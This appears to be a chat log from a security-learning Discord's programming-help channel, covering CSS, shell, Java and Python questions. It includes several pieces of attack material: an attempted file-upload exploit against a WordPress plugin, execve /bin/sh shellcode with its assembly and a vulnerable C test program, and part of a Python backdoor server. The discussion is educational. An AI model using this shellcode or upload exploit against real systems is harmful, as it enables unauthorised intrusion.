p32, p64, and the generalized pack function all turn hexadecimal values into strings of bytes which can be used in your exploits.

p32(0xdeadbeef)
>>> b'\xef\xbe\xad\xde'

If you ever have a question about any function from a library, I highly recommend reading the documentation first.

Hey so I have a little question in connection to a writeup/documentation website im working on for my CTFs and general pretesting related stuff.

I have this css file I've referenced to my html

however it seems one of the classes I've made isn't applying it's properties to the <div> that I've put one of my paragraphs under

essentially it's supposed to center it on to the screen while also keeping it at the bottom of it

but it ignores or rather doesn't apply the alignment

  position: absolute;
  bottom: 0;
  text-align: center;
}```

here's what it's supposed to apply as a class

    <p style = "color: #262525; font-size: 100%;"> 2022 [name] Ⓒ All rights reserved</p>
</div>```

and here's the html snippet it's supposed to apply it to

however it seems to completely ignore it

on the left bottom corner is what's supposed to be centered

and here's what it says in the devtools

only using the padding property has worked up until now to get it centered, but I worry it's not going to be actually centered correctly if I specified it using percentage for all devices

Alright so nvm, stack overflow came to the rescue. I've sort of fixed the problem meaning it's now centered but still not compatible with mobile devices fully which wasn't my intention anyway but I figured I would go for it still

just curious, is typescript used often? It seems pretty good

Try css flex method, to display the item to center or right etc

Hey everyone!
I was wondering if someone would be able to help me, I found this https://snapshot.debian.org/ and had a couple of questions.
First, how would I go about adding this to my apt command in Ubuntu?
And second, is it possible to add this to a non-Debian based distro such as Fedora?

Absolutely do not

Debian and Ubuntu are not the same

So not mix and match packages across distros.

I see, is there something similar for Ubuntu?

Not sure.
This isn't programming related though.

Sorry, didn't know where else to really post it

very much so

it's a JS superset, and something of a beast to get used to if you've been using JS alone for a while

hi,
i want to find files (plurial) and i want to do it from a list i made. from a .txt file.
i didnt found a clear answer

how can i found files based on a list of names?

Use find?

i know find but i dont want to write 10 names.. i want something more efficient

Scripting with find.

ok. thats what i mean.
any help with the way to write it

?

@earnest sapphire do you have a specific language you want to use, or are you planning on shell scripting?

a quick google appears that this could be a one-liner, something like this: while read -r line; do COMMAND; done < input.txt

in bash, zsh, etc.

oh nice, that's great, thank you

@paper sky sure, no problem

kind of interesting to see your question. I was literally working on some research to add Recoil (written in JS) support to MillionJS (written in TS)... so conversions would be necessary, and I haven't done any TS in a couple of months 😛

i wanted to use a classic shell as egrep -i -f <names.txt> Downloads
but it work only if you want to check a file not a directory

and i want to search in all the target a list of files that may be there
i am connected by ssh btw

hmm, isn't readdir is a pretty standard kind of thing?

readir and what after that?

ah no, looks like you just use a for-loop

@earnest sapphire i would filter for the files i was looking for and read them into the aforementioned while loop

however, as Ninja mentioned, find could be exactly what you're looking for. something like: find myDir/ -name *.js | ... but don't quote me on that exactly, i'm rusty with shell 😛

hmm yeah find doesn't seem to be able to take a list of files for the -name flag, but as mentioned above you can read in the list of files and shove each into find:

while read -r file; do find . -name $file 2>/dev/null; done < files.txt

Hey guys!

Does someone help me teach the basic of ?

Programing

How do I know it's pinned?

Okayy. Yahh that's why I'm here 😆

Hey everyone!
I was wondering if someone could help me out?
I am trying to download a specific file from a private repository, how might I go about doing this?

Get the repository owner to grant you access

I am the repo owner, but I am very bad at git

I am trying to download a specific file from my private repo through the command line

Ok I will take a look thank you!

Has anyone developed a nodejs url directory scanner?

what do you mean?

like directory fuzzing?

(searching for valid files and directories)

hello

Pretty sure it exists, but it shouldn't be too hard to code up

I'm assuming like ffuf or gobuster

haii anyone faces 504 testing api problem??

Im having trouble with this script

when I run it

and put

a txt file thats located in seclists

it returns this

found the problem

fixed now

https://youtube.com/shorts/uvtzXswK-bg?feature=share

Must watch

I am building a star wars card game in java

when a deck is created there is a for loop that runs through the suits and values and creates a unique version of each card. There are two zero cards that would be made, but neither has a suit and is just a tiebreaker card.

the way my deck setup is built is that the Card would take a Suit variable and a Value variable

how can i add two zeros with the correct datatypes?

public void createFullDeck() {
        
        for(Suit cardSuit : Suit.values()) {
            for(Value cardValue : Value.values()) {
                //add new card
                this.cards.add(new Card(cardSuit,cardValue));
            }
        }
        
        //this.cards.add(new Card("ZERO","ZERO"));
        //this.cards.add(new Card("ZERO","ZERO"));
    }

Assuming you're the one who created the Suit and Value classes, just add support for a null or 0 value, and then you can use that to initialize the "zero" card.

zeroSuit = new Suit(null);
zeroValue = new Value(null);
this.cards.add(zeroSuit, zeroValue);
this.cards.add(zeroSuit, zeroValue);
// or just construct the objects in the add() idk it's your code

Yes

Curious to see if anyone has developed it in nodejs before.

Or in any other language besides python.

There are tools like gobuster or ffuf written in Go.

also feroxbuster built in rust is a popular tool for this and great performance https://github.com/epi052/feroxbuster

It is quite old but there is also dirb which is written in C.

Fetch is also async by default which could be interesting

https://www.exploit-db.com/exploits/49490 any idea how to exploit this in python?
I am trying

import requests
files = {'files[]': ('files/upload.php4', 'rb')}
data = {'filename' : 'upload.php4'}
r = requests.post('https://localhost/wp-content/plugins/super-forms/uploads/php/', files=files, data=data)
print(r.headers)```
but it doesn't seem to be working

What’s the output?

When you run it

nothing basically, it returns the same response as a get request

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF``` I am specifically asking for this, I have no idea how to include this in the request

looks like you can't upload a php4 file

Isn't that snippet just showing a form variable, rather than enforced serverside restrictions?

Can someone help me with recursion? I can't implement my codes to work recursively. Despite numerous videos I watched, I still can't do it. People say that the factorial example helped them, but it didn't work for me...

I don't really know what I'm looking at due to the limited context but something is weird

Maybe this helps, he has done a good job in explaining recursion.
https://youtu.be/oBt53YbR9Kk

Thanks! I will check it out

Gave +1 Rep to @heavy rampart

anyone know how to get the nth directory from Get-ChildItem -Directory?

powershell

i've tried just accessing by index [n] but that does something i can't explain

and using | Select-Object -First n | Select-Object -Last 1 also does something weird

nevermind it's working now

What fixed it?

Hello, I wasn’t to learn powershell and have no prior experience with it. Does anyone have good resources I could use for that? I eventually want to script with powershell

I'm having trouble searching for answers online, inserting variables into a bytes-encoded string.

$ python3 tcp_client.py "/something.php"

target_query = argv[1]

client.send(b"GET %s HTTP/1.1") % argv[1]

TypeError: unsupported operand type(s) for %: 'int' and 'str'

I guess it doesn't see the %s, but it works in normal strings.

nope... doesn't see it

here's the full thing:

tcp_client.py "10.71.71.1" "/something.php" 9998

#!/usr/bin/env python3

import os
import socket
import sys
from sys import argv

target_host = argv[1]
target_query = argv[2]
target_port = int(argv[3])

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client.connect((target_host,target_port))
client.send(b"\r\n\r\nGET %s HTTP/1.1\r\nHost: none \r\n\r\n") % argv[2]
    

response = client.recv(4096)

print(response.decode())
client.close()

ive tried other methods like {}, which works with fstrings

it connects fine but the string errors out and no real data gets sent

i'm wondering if it's even possible

You have a logic error in how you are doing the replacement in the string. Go back to the order of operations..... and the way you are doing formatted strings was, as far as I know, deprecated with py2.

.format() doesn't work either, if that's how you mean

b"" doesn't support it, at least

Correct

template strings?

That is a way to build the correct string

But does not get you all the way there

i'm guessing it needs to be "packed" prior, i'm reading more on formatting

or defining a function...

You are pretty close. You may find the mozilla docs on a properly formatted GET request illuminating

defining a function worked, with global variables... thanks for the hint

+rep @magic falcon

Gave +1 Rep to @magic falcon

global variables are not recommended; too easy to have naming conflicts

hmm..

it's fine for short 1 file projects without a lot of imports, but for anything non trivial it can create a lot of havoc

as a sample, here's my code for the same thing you just did:

import socket
from sys import argv

tgt_host = argv[1]
tgt_q = argv[2]
tgt_port = int(argv[3])

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
    client.connect((tgt_host, tgt_port))
    code = bytes(f'GET {tgt_q} HTTP/1.1\r\nHost: {tgt_host}\r\nAccept: */*\r\n\r\n', 'utf-8')
    client.sendall(code)
    response = client.recv(4096)
print(response.decode())
client.close()```

the final client.close() may be unnecessary, as the client object should automatically call close as it leaves the scope of the with statement

yeah, the function is hanging as well... that's odd

connection accepted but it's hanging

I didn't do exhaustive testing by any stretch, my snippet functions and exits against python http.server

what kind of system are you running your code on?

did you check the local firewall ports?

it's an OpenWrt, using a simple python tcp-server script

there are a lot of rules, but I also tested with a much simpler, no args script with the same structure and it received and responded just fine.

It's likely that there is a http header item your human-made request is missing

you could always grab a pcap of a curl request to get your query and compare that to the pcap of your snippet

the post-form is just a farce... only a PoC, there's no real page it's querying

but it does recieve data sent and types it out.

but it hangs? interesting. can you step through your python code to see which line it doesn't return on?

Something like:

# With a defined function

def main(x,y):
    socket.....
    connect....
    send(b"")...

    receive....

print & end

Server:

root@OpenWrt:~/Scripts/Python# ./tcp_server.py 

[*] Listening on 0.0.0.0:9998
[*] Accepted connection from 10.71.71.210:47244
[*] Received:

[hang]

Static/ hard-coded

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host,port))
client.send(b'This is a message')

response = client.recv(4096)

print(response.decode())
client.close()

Server:

root@OpenWrt

[*] Accepted connection from 10.71.71.210:47248
[*] Received: This is a message

Response to client:

lemur@kali~$ ./tcp_client.py 10.71.71.1 "/" 9998
Acknowleged.

Right, but that's for a generic TCP port right? It's not expecting an HTTP GET request specifically.

No. there's nothing on the back-end. It just prints data

it's esentially just telnet

I don't think it has any real functionality, at least not that i know of yet

These are the beginning chapters to BlackHat Python II

Yeah, that makes sense. Be careful of the code, even in BHPv2. The 2->3 code migration is unreliable at best.

have you read it yet?

I don't have a frame of reference but I also didn't know it was migrated

from 2 to 3

Yeah

I learned both py2 and py3, and the differences are pretty obvious when you know both

there were some substantial style and syntax conventions that were changed

I've read that it's more "concise". Not sure if that's true or not

I also have both versions of BHP; and the code was touched just enough to usually run, although copy and paste isn't always reliable

not concise, but more clear

It's not

py3 is a step in the right direction in just about every way I can think of

wait, you mean py3 is more clear? Yeah, I think I'd agree with that. The semantic meaning seems to flow a little better, and it's a little closer to writing pseudocode

right. "clearly defined"

couldn't find the words

not sure how I will handle C but that's for another time

i dread the day

It's a different way of thinking.

just the syntax is intimidating. it seems really ephemeral

a lot of colloquial language, it seems like

It's the exact opposite of colloquial. It's pure technical.

It is context-dependent though. Maybe that's what you mean.

yes, english

not my strongest

Is there anyone whose strong on python that can just give me a quick moment's advice? I've created a password generator (with assistance from Youtube/Guides as I'm still learning) The routine loops after creating the password and i'm trying to have it so that once the password is generated I then get given an option to "press any button to close the window" which then closes said window? Is anyone able to assist with the code required?

Normally when you execute a python script, it will exit automatically if the script finished executing and doesn't have to do anything else.
It'd depend though on the code you have written, because what we expect might not necessarily be what you wrote.

Feel free to post the code here, I don't mind taking a look and see if I can explain why

import random

chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456!@#£$%^&*(`)"

while 1:
password_len = int(input("What length would you like your password to be : "))
password_count = int(input("How many passwords would you like : "))
for x in range(0,password_count):
password = ""
for x in range(0,password_len):
password_char = random.choice(chars)
password = password + password_char
print("Here is your password : ", password)

Those loops don't look right

Oh?

Yeah your loops indeed look wrong, your script is infinitely looping essentially

I'll go back to the guides and work out where it has gone wrong. Thank you for your assistance.

Not done yet 🙂

Your issue is the While 1:

You wrote it in a way where that is always true

because of this, you've created an infinite loop

remove that, undo the tabs and it will exit after running

import random

chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456!@#£$%^&*(`)"

password_len = int(input("What length would you like your password to be : "))
password_count = int(input("How many passwords would you like : "))
for x in range(0,password_count):
    password  = ""
    for x in range(0,password_len):
        password_char = random.choice(chars)
        password      = password + password_char
    print("Here is your password : ", password)

Here's the "fix"

What you could do for a next step to aid your study, try to put this inside of a function

That could be fun for you

The issue that I can foresee and why I requested the, press any button to close the window is that I will first need to be able to copy the password generated. If it closes after generating then I won't have enough time to copy? 😛

Not a problem my friend, it depends how you run the script

Are you on Windows?

Or Linux?

Mac?

Potato

Haha, Windows. Running the .py file which is opening a CMD box.

Ah, let me teach you a trick

open up the directory in your file explorer where you've saved the script. Go to the address bar and type "cmd"

this will open command prompt already with that directory open

Then type python script.py

and you will retain the output

what you could also do, is add another function to your script which would be to copy the password to your clipboard

that could also be fun

I'll give it a try and thank you. It is my aim to keep working on it so I'll look at doing both!

Thank you very much!

Not a problem at all! Have fun and stay curious 🙂

Always!

Neat trick, I usually do File > Open PowerShell Here

A colleague showed me it sometime ago, been using it ever since to launch CMD or Powershell etc. Everyday is a school day!

if I draw rectangle using pyqt5, how can I select it after drawing … I have its coordinates, is there any way to do that ?
so I can delete or move or copy it after

And if you aren't using the modern windows terminal you're doing it wrong

Ah yes forgot about that existing

So much better than the alternatives

I am beginning a project with some pretty heavy code review. It’s written in C and i had a decent amount of experience working with C both writing code and exploiting it in school, but I was wondering if anyone had any good resources in mind to learn or guide through code security review? Especially if it’s specific to C

import string
import concurrent.futures
import random
import sys


def password_generator(pass_len, char_set=string.printable.replace(string.whitespace, '')):
    password = ''
    for char in range(0, pass_len):
        password_char = random.choice(char_set)
        password += password_char
    return password


if __name__ == '__main__':
    try:
        while True:
            pass_count = int(input("No of passwords:"))
            pass_len = int(input("Length of passwords:"))
            no_of_cores = input('No of cores you want to use (default = 1):')
            print(no_of_cores)
            if no_of_cores is not int:
                no_of_cores = 1
            else:
                pass
            with concurrent.futures.ProcessPoolExecutor(int(no_of_cores)) as executor:
                list_ = [pass_len for x in range(0, pass_count)]
                res = executor.map(password_generator, list_)
                for r in res:
                    print(f"Your password is: {r}")
            print("Press CTRL C to exit")
    except KeyboardInterrupt as err:
        print("\nStopping")
        sys.exit(0)

concurrent.futures.ProcessPoolExecutor(int(no_of_cores))

I swear its the ammount of workers, not cores

He He He flexing skills

maybe just watched tutorials

@odd hareThank you, just what I was looking for. 🙂

YAAAY WELCOME !!!!

I'd use a proper CSPRNG for the password generation

You better use secrets instead of random

It just needs to be basic really, nothing too fancy. Just want password generation done on my machine rather than some website that's telling me it's been done on my machine but actually it isn't.

yeah but using a basic PRNG can lead to someone cracking your passwords if they know/guess the seed

Even if it's randomised?

Forgive me I'm not massively up on Python yet, I'm trying to learn but not to the degree you guys are likely at.

yeah it's deterministic

computers can't do random very well

hey hey just playing no need to jump.

import secrets

def password_generator(pass_len, char_set=string.printable.replace(string.whitespace, '')):
    password = ''.join(secrets.choice(char_set) for _ in range(pass_len))
    return password

By the way I am a noob so I looked up CSPRNG == Cryptographically secure random number generator?

lol

Hello, everyone
I'm using Python as the main language I use, I'm intermediate level in python
I've heard about Golang, It's worth it to learn Golang or should I keep using python

Learn whatever the hell you'd like to learn is my motto. A lot of programming languages share similarities so you can usually transfer what you've learned.

Heyooo , I need some help in my recon script.
I am trying to use censys for gathering IP of the domain.
The command i am using for censys is censys search ' services.tls.certificates.leaf_data.subject.common_name: "$domain"' --index-type hosts | jq -c '.[] | {ip: .ip}' > $ip/ip.txt

However, when i run my recon script, lets say recon.sh example.com i am getting a list of completely unrelated IP addresses.
Am I doing anything wrong here?

Learning programming languages are not mutually exclusive lol, you can just learn both

i have a question, lets say i have a string in Java and i need to count the amount of data Types in the text( like "10 number 2.0" where there is 1 int, 1 string and 1 float) after the part that i separate the string by space, is there a way to get the value of the string?

Data types are not nested in the way you think.

This also sounds like a homework assignment

is actually a job assignment i failed, trying to solve it in case i get the same question again

i think i found a way

The first thing that comes to mind is a custom method where you have a series of try catch with Integer.parseInt, Fload.parseFloat, and so on, and if all else fails then it's probably a string, there's also probably a method within String to check if the content is numeric or not

you just described what i did

in case, if int and float fail

i have to be string

you could also use a regex to check if there are digits if that's all you need

anybody have bluestacks on their system here?

Why?

anyone here familiar with the ssl library

Python

Thanks for the video. Even though I haven't fully watched the video, it helped me grasp the basic idea of how to implement recursion in my codes.

https://dontasktoask.com/ ❤️
Just post your question and if someone knows/has time they'll respond

guys, How can I make drawing visible while moving mouse in pyqt QGraphicsScene in python?

how do u send msgs like that

that's using markdown of triple backticks

hello

There are some tips in the pinned messages on this channel as well 🙂

Hi there, enter your question into google and you should see some results from StackOverflow
Give this one a shot, I hope that helps! https://stackoverflow.com/questions/73554372/how-can-i-make-drawing-visible-while-moving-mouse-in-pyqt-qgraphicsscene

I am who asked this question on stackoverflow 😅

No way! 😂

At least we've gone full circle

A noob question so I apologise in advance. I intend to learn a programming language for the first time. Is there any reason I shouldn’t choose Ruby over python? Obviously it’s subjective and there will be many based on the individual, but I want to hear your thoughts

I'd say Python is one of the easiest first time programming languages. Just a personal opinion though.

Python is a lot more high level than Ruby. Ruby is more general purpose, but that is not necessarily what you're looking for in a first programming language.

Unless you intend to specifically use Ruby for your first project of course

I know python is preferred for handling data etc and ruby is generally used for web development. I’d assume for writing exploits etc they’d both be equal?

Is ruby better for web development or is python now equal?

Well I'm the wrong person to ask, since I've never used Ruby myself.

As far as Python goes. With Django or Flask you can make a pretty solid website. However I tend to use either PHP (with a framework such as Laravel) or NodeJS for web development more.

IMHO you can use both python & ruby for webDev (the backend side of it), general automation this includes "PoC" / Exploit dev

just try both of them / go over the basic tutorials and try what is nicer / easier syntax for you - personally I cannot stand python

Alright, thank you both

That’s a code block^

I have to disagree with most of what you said here. Python and Ruby are both about the same "height", in terms of abstraction from native code.
Both run in a language specific VM environment, both support (somewhat OOP). Ruby is probably closer to natural language given the language syntax.
From my own experiences, Ruby runs noticably slower than equivalent python code, and Ruby devs have a surprising tendency to re-invent the wheel, notably the regex libs. As a security person, it's interesting to note that metasploit was written in Ruby.
Python is absolutely a ubiquitous, general purpose language in the linux world. Everything from daemon processes, web servers, data science, GUI apps get written in python.

You're right.

Ruby is probably closer to natural language given the language sytax
That's what I was getting at.

Now I just feel that python works simpler/quicker. I can't really tell you why. Just personal opinion

That I'll agree with. The syntax for Ruby is very close to Visual Basic syntax, which I think is a lot of additional typing to do the same thing.
Writing python feels like writing pseudocode, a lot of the time

Writing python feels like writing pseudocode, a lot of the time
True. Which is why I don't use it often for bigger projects. But quick scripts are so easy in Python.

And it is very easy to pick up. Which is why I'd recommend it for a first programming language. You can learn it in an afternoon and then with that knowledge move on to another language of your choice

Python and then maybe I’ll jump in the deep end and learn rust

So many languages. It’s hard when you’re indecisive

I’ll start with python though

Probably best I start with a particular project in mind and then choose my languages I learn around that

If you are brand new to programming, having a project is a great idea. But it's very easy to pick a first project that is a lot more complicated than you are expecting. Codewars and Euler Project are both fantastic 'small' projects to use as learning assignments.

I’ll check them out

Check out the pinned messages for some good sites / mini-projects

That’s quite a list to work through. Cheers

https://cdn.discordapp.com/attachments/267624335836053506/901356483470589983/printreturn.mp4

Cool animation I found

Ruby syntax is not similar to Visual Basic... that is misleading. VB uses CamelCase everywhere, Ruby only uses CamelCase for class/module names; method names are snake_case and constants are SHOUT_CASE. VB requires parenthesis for function definitions, Ruby does not. VB functions end in End Sub, Ruby methods end in end which is four less characters to type. VB's version of null is called Nothing, Ruby calls it nil which is less to type. VB matches Regular Expressions using Regex.IsMatch(email, "..."), where Ruby has inline Regular Expressions email =~ /.../ which again is less to type. VB supports typed variable declarations, in Ruby you only declare the getter/setter methods and set the instance variable. Ruby can also often read like english or pseudo-code (ex: 5.times { puts "hello" }). There are also instances in Python where you have to type more stuff than Ruby (ex: re.compile("regex-here") vs /regex-here/ or self.foo vs just foo).

I think that's fair to say the actual syntax may not be as close to VB as I remember; my experience with Ruby was pretty limited, and several years ago. Very close is an estimation from memory, and I remember it feeling like variable and function declaration being unnecessarily verbose just as in VB. Your comparison of usage of python's OOP implementation vs what looks like a language keyword wouldn't be a fair comparison either, though.

My primary pain point with ruby was the fluentD regex system, which is a pretty far departure from the POSIX-compliant and derived regex definitions I'm much more familiar with.

no it's not fair to say Ruby syntax is close to VB. I just listed multiple examples of how VB syntax is different from Ruby syntax that I found by doing a quick Google search of VB syntax. Don't rely on fuzzy memory when you can Google it. I also do not see why my comparison of Python syntax vs. Ruby syntax is "unfair". I think we can agree that there are instances in Ruby where one would type fewer characters than the equivalent code in Python.

Having worked in Ruby for 15 years, I have never used or heard of fluendD so I can't speak for it. I had to double check, but Ruby switched to the Oniguruma regexp engine in 1.9.0 (released back in 2007), which supports both POSIX and Perl-extended regex modifiers and can handle unicode encodings. Apparently Atom and TextMate editors also use it.

Solved for anybody who saw that message and was wondering why I deleted it

saw for 1 second

and don't know what it is

Lmao yeah it was just some issue with it not accepting """

my express js site gets stuck on a loading screen for forever and im not sure how to fix it! any express js gods?

im in general as the code is far too much to send as a whole

Have you checked the console for any errors

I am following this git repo to learn binex and I am at removing null bytes part(link points to that part itself).

I am trying to run exploit but I am getting segmentation fault no matter what I do.

`#include <string.h>

int main(int argc, char *argv[]){

char code[1024];

strncpy(code,argv[1],1024);
((void(*)(void)) code)();

}`
This above vulnerable code is same as author's .

`SECTION .text ; Code section
global _start ; Make label available to linker

_start: ; Standard ld entry point
jmp callback

dowork:
pop esi ; esi now holds address of "/bin/sh

xor     eax,eax     ; zero out eax
push    eax     ; args[1] - NULL
push    esi     ; args[0] - "/bin/sh"

xor edx,edx     ; Param #3 - NULL (zero out edx)
mov ecx,esp     ; Param #2 - address of args array
mov ebx,esi     ; Param #1 - "/bin/sh"
mov al,0xb      ; System call number for execve (use al mov)
int 0x80        ; Interrupt 80 hex - invoke system call


xor ebx,ebx     ; Exit code, 0 = normal
xor     eax,eax     ; zero eax
mov al,1        ; System call number for exit
int 0x80        ; Interrupt 80 hex - invoke system call

callback:
call dowork ; call pushes the next address onto stack,
; which is address of "/bin/sh"
db "/bin/sh",0 ;`
Above is my assembly code which is working perfectly.

I copied author's shellcode directly and used it as argument to my binary but I am receiving Segmentation fault. I compiled my binary with -fno-stack-protector -z execstackflags to be sure that my stack works but same segmentation fault.

In above assembly, the addresses of instructions are wrong initially and stay this way till I execute program once.

Exploit :
\xeb\x17\x5e\x31\xc0\x50\x56\x31\xd2\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

https://www.reddit.com/r/ethicalhacking/comments/x4ndne/getting_segmentation_fault_when_trying_to_execute/
Asked this on reddit too

I wonder, is there any way to make

class widget:
    def __init__(self, x, y, width, height, value) -> None:
        self.x = x
        self.y = y
        self.width = width
        self.height = height
        self.value = value

into something cleaner, without having to repeat each line?

Ah wait this would be better as a dataclass lmao

my vscode server.js wont debubg? it just gets stuck at c:\program files\nodejs\node.exe

Kinda quiet so gonna sneak this in here for anybody who has the time and wants something to do - Would love any constructive criticism / thoughts on making this more pythonic, better code etc.

https://github.com/Jayy001/Carta/blob/main/main.py

Does wait() in bash wait only for the commands executed and backgrounded in the script?

I think it waits for the background processes to be complete

Yeah, does it mean the backgrounded processes that are in the current terminal session, like the ones you can see with the command bg. Cause I think every terminal session has its own backgrounded processes.

<script>
        $(document).ready(function () {
            $('button#send-url').click(function() {
                $.ajax({
                  url: '/user/upload',
                  data: "url="+$("input#url").val()+"&title="+$("input#title").val(),
                  type: 'POST',
                  success: function(data){
                    var answer = confirm("Are you sure that you want to upload this file?")
                    if (answer) {
                        $.ajax({
                            url: '/user/upload/save',
                            data: "file_name="+data["file_name"]+"&title="+data["title"]+"&uploaded_from=" + data["uploaded_from"] + "&role=user",
                            type: 'POST',
                            success: function(data){
                                location.reload(); 
                            }
                        });
                    }
                    else {
                        location.reload(); 
                    }
                  }
                });
            });
        });
    </script>

I got an upload form with a script like this and I reckon there can be some form of DOM-based XSS out of this but I'm not particularly sure how

What sink do you think you'd be hitting?

I don't know what that means

If you injected an XSS payload, where could it end up that could possibly run?

can I dm? I don't want to spam the chat

Zero reason for it to be a DM

aight cool, I tried putting a javascript:alert(1) right below the $(document).ready(function () { line (I intercepted the response on burpsuite and added the code since its just there in the HTML) and it gave me an alert

I'm guessing around the #title part but I am not sure, if it doesn't seem like it would work then I'll figure out something else

I can't do the #url since anything other than a URL simply doesn't get parsed

That's not XSS.

Why do you think it's vulnerable?

I was assuming that because I was given an upload form with 2 textboxes to enter image URL and title each. I tried doing some form of format manipulation to get an executable to work but it won't work so my next guess was XSS because a script was given in the DOM

Would you like a link to the CTF? It'll make more sense that way

So you're cheating.

I just asked if you wanted a link to for me to explain it, I don't get what you're on rn.

I'm not asking you to do it for me

Asking for help with an active CTF is considered cheating

We're not competing

This isn't from THM to begin with

I didn't say THM. I said active CTF.

It's not even public

It's a private one

Still.

Forget it

Can't believe I'm getting this for trying to practice CTFs

No, just that we do not help with active ctfs, nor coursework. Some companies use private ctfs for hiring (for example). We do not and can not know all the circumstances and helping with these can be considered cheating, and lead towards academic penalties or worse (in the case of coursework)

If you want to learn a CTF with help, use a retired one. It's really that simple. See if any of that can be used when tackling other old ones or active ones, etc.

anybody is able to understand this code so please explain me

i am a beginner so i am not able to understand this javascript

At a general level, it seems to manage the submit button of two forms - One for login, one for "forgot password".

In the bottom part, it seems to me it switches which form is shown to you: login as default, forgot password if you click the $(".forgot-pwd") element.

It seems to perform some sort of validation before actually posting the data.

What is your specific problem with the code?

its not my code, i just found it on my friends website, leave it, its not my work, i was just playing with it

anyways thanks

I'm deleting that, don't post code from your friend's website in a public discord @desert quest

okay

Hi All . Can anyone help me out with a python socket code. I am not able to understand what "s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)" in the below code does exactly. I was looking into a simple python based backdoor(client and server). Below is the partial server code. I tried with the google results but didn't quite understand this line.

#!/usr/bin/python3

import socket
import sys
import os
import platform


server_addr = ""
server_port = 5555

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)

s.bind((server_addr,server_port))
s.listen(1)

connection, address = s.accept()

That function lets the script reuse the socket after it was created

Ok. So why actually do we need to reuse the socket. The code that I just pasted is trying to bind the socket with an NIC and port 5555. So is there any specific reason for reusing the socket

It lets you reuse a socket that's stuck in TIME_WAIT primarily

Okay..thanks

No worries, here's some more info on the python docs

Note On POSIX platforms the SO_REUSEADDR socket option is set in order to immediately reuse previous sockets which were bound on the same address and remained in TIME_WAIT state.

https://docs.python.org/3/library/socket.html

I'll check it out

Is there a way in python when I have a large file (ex 500 lines) and in between each section of text, there is a * What i want to do is get each section before the * and write it a new file, then do this for the rest of the sections. Any ideas?

its showing correct answers in Custom inputs but on submitting its saying all 8/8 wrong compiler wrong

Correct your capitalization on your output for one.

And remove your fucky spaces on your print statements in the string

It helps if you print what it tells you to, and nothing else.

where are you saying in the **if **statement??

All of them. Check what you're meant to print, and make sure they're exactly correct.

I'm not correcting your code for you

All your capitalization is wrong

A 'w' and a 'W' are not the same. Fix that

In future, ensure you follow the instructions very closely.

my codes are correct because its running the code well its just saying compiler wrong while submitting the code

You're not listening so I'm going to stop trying to help you

and how itts affect the main code if i write anything in the statement area

You're ignoring what I'm saying...

You missed one Jayy

how weird...

but these are inside the print statement how its going to affect the main code ;-;

whhy am i so dumb not able to understand things

@devout peak fwiw, it's very rude to ask for help and ignore it.
What you're printing is how the site is validating your output. Fix those problems. Show us what problems you're having.

well.. if it's comparing what's expected with your results and your results don't match what's expected.. you're not going to get a "correct" on the exercise.

that said, is this your full code?

ooh alright then I am going to make corrections as you said then show it to you again back in some min

yess its the complete code

Hello, I would like to ask, where can I ask questions about career development in cyber sec?

#cyber-and-careers should be a nice place

might be missing an import or two

imports were pre-written there my task was to write the main body only

what errors are you getting

no error in code it just saying compiler wrong while submitting

screenshot?

with random input